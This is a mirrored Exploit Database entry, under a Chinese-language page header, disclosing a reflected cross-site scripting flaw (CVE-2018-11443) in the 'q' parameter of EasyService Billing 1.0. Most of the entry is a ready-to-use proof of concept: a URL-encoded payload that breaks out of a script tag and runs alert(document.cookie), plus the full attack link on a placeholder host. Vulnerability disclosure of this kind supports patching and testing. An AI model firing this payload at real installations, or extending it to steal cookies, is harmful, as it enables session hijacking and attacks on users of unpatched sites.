EasyService Billing 1.0 – Cross-Site Scripting

• Exploit Database
• 22 阅读

• 作者： Divya Jain
  日期： 2018-05-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44764/

• <!--
  # Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter
  # Date: 25-05-2018
  # Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 
  # Exploit Author: Divya Jain
  # Version: EasyService Billing 1.0 
  # CVE: CVE-2018-11443
  # Category: Webapps
  # Severity: Medium
  # Tested on: KaLi LinuX_x64
  # # # # #
  # 
  # Proof of Concept:
  #
  ///////////
   //XSS//
  ///////////
   
   Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=
   Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27
   Parameter: q
   Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27
   
   ###########################################################################